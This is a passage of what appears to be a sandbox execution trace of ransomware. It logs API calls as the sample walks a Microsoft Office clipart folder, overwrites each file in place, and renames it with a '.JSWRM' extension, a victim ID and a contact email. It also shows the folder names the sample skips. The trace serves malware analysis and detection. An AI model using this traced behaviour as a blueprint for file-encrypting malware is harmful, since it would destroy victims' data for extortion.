lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.730] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.730] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0076.731] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\east_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.731] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6165) returned 1 [0076.731] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.731] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1810) returned 0x205850 [0076.731] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1810, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1810, lpOverlapped=0x0) returned 1 [0076.733] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.733] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1810, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1810, lpOverlapped=0x0) returned 1 [0076.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0076.733] CloseHandle (hObject=0x314) returned 1 [0076.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0076.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0076.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0076.733] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0076.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0076.733] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0076.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0076.733] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0076.733] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\east_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\EAST_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\east_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0076.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0076.734] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0076.734] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x566, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="ED00010_.WMF", cAlternateFileName="")) returned 1 [0076.734] lstrcmpiW (lpString1="ED00010_.WMF", lpString2=".") returned 1 [0076.734] lstrcmpiW (lpString1="ED00010_.WMF", lpString2="..") returned 1 [0076.734] lstrcmpiW (lpString1="ED00010_.WMF", lpString2="...") returned 1 [0076.734] lstrcmpiW (lpString1="ED00010_.WMF", lpString2="windows") returned -1 [0076.734] lstrcmpiW (lpString1="ED00010_.WMF", lpString2="recovery") returned -1 [0076.734] lstrcmpiW (lpString1="ED00010_.WMF", lpString2="perflogs") returned -1 [0076.734] lstrcmpiW (lpString1="ED00010_.WMF", lpString2="documents and settings") returned 1 [0076.734] lstrcmpiW (lpString1="ED00010_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.734] lstrcmpiW (lpString1="ED00010_.WMF", lpString2="system volume information") returned -1 [0076.734] lstrcmpiW (lpString1="ED00010_.WMF", lpString2="msocache") returned -1 [0076.734] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0076.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ED00010_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ED00010_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ED00010_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0076.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0076.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ED00010_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ED00010_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ED00010_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0076.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0076.735] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0076.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.735] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.735] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0076.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00010_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.736] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1382) returned 1 [0076.736] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.736] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x560) returned 0x2332c0 [0076.736] ReadFile (in: hFile=0x314, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x560, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e89c*=0x560, lpOverlapped=0x0) returned 1 [0076.737] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.737] WriteFile (in: hFile=0x314, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e898*=0x560, lpOverlapped=0x0) returned 1 [0076.737] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0076.737] CloseHandle (hObject=0x314) returned 1 [0076.737] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0076.737] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0076.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0076.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0076.738] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0076.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0076.738] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0076.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0076.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.738] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00010_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00010_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00010_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0076.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0076.738] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0076.738] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x32f2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="ED00019_.WMF", cAlternateFileName="")) returned 1 [0076.738] lstrcmpiW (lpString1="ED00019_.WMF", lpString2=".") returned 1 [0076.739] lstrcmpiW (lpString1="ED00019_.WMF", lpString2="..") returned 1 [0076.739] lstrcmpiW (lpString1="ED00019_.WMF", lpString2="...") returned 1 [0076.739] lstrcmpiW (lpString1="ED00019_.WMF", lpString2="windows") returned -1 [0076.739] lstrcmpiW (lpString1="ED00019_.WMF", lpString2="recovery") returned -1 [0076.739] lstrcmpiW (lpString1="ED00019_.WMF", lpString2="perflogs") returned -1 [0076.739] lstrcmpiW (lpString1="ED00019_.WMF", lpString2="documents and settings") returned 1 [0076.739] lstrcmpiW (lpString1="ED00019_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.739] lstrcmpiW (lpString1="ED00019_.WMF", lpString2="system volume information") returned -1 [0076.739] lstrcmpiW (lpString1="ED00019_.WMF", lpString2="msocache") returned -1 [0076.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0076.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ED00019_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ED00019_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ED00019_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0076.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0076.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ED00019_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ED00019_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ED00019_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0076.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2106b0 [0076.739] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0076.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.739] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.739] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0076.739] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00019_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.739] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13042) returned 1 [0076.739] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.740] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x32f0) returned 0x24d210 [0076.740] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x32f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x32f0, lpOverlapped=0x0) returned 1 [0076.742] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.742] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x32f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x32f0, lpOverlapped=0x0) returned 1 [0076.742] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0076.743] CloseHandle (hObject=0x314) returned 1 [0076.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0076.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0076.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0076.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0076.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0076.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0076.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0076.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0076.744] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0076.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0076.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0076.744] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0076.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0076.744] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0076.744] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00019_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00019_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00019_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0076.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0076.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0076.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0076.745] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdc09280, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdc09280, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdc09280, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa8c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="ED00172_.WMF", cAlternateFileName="")) returned 1 [0076.745] lstrcmpiW (lpString1="ED00172_.WMF", lpString2=".") returned 1 [0076.745] lstrcmpiW (lpString1="ED00172_.WMF", lpString2="..") returned 1 [0076.745] lstrcmpiW (lpString1="ED00172_.WMF", lpString2="...") returned 1 [0076.745] lstrcmpiW (lpString1="ED00172_.WMF", lpString2="windows") returned -1 [0076.745] lstrcmpiW (lpString1="ED00172_.WMF", lpString2="recovery") returned -1 [0076.745] lstrcmpiW (lpString1="ED00172_.WMF", lpString2="perflogs") returned -1 [0076.745] lstrcmpiW (lpString1="ED00172_.WMF", lpString2="documents and settings") returned 1 [0076.745] lstrcmpiW (lpString1="ED00172_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0076.745] lstrcmpiW (lpString1="ED00172_.WMF", lpString2="system volume information") returned -1 [0076.745] lstrcmpiW (lpString1="ED00172_.WMF", lpString2="msocache") returned -1 [0076.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0076.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ED00172_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ED00172_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ED00172_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0076.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0076.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ED00172_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0076.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ED00172_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ED00172_.WMF", lpUsedDefaultChar=0x0) returned 12 [0076.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0076.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0076.745] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0076.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0076.745] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0076.745] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0076.745] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ed00172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0076.746] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2700) returned 1 [0076.746] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.746] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa80) returned 0x22fd48 [0076.746] ReadFile (in: hFile=0x314, lpBuffer=0x22fd48, nNumberOfBytesToRead=0xa80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesRead=0x345e89c*=0xa80, lpOverlapped=0x0) returned 1 [0076.747] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.747] WriteFile (in: hFile=0x314, lpBuffer=0x22fd48*, nNumberOfBytesToWrite=0xa80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22fd48*, lpNumberOfBytesWritten=0x345e898*=0xa80, lpOverlapped=0x0) returned 1 [0076.748] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22fd48 | out: hHeap=0x1e0000) returned 1 [0076.748] CloseHandle (hObject=0x314) returned 1 [0076.748] 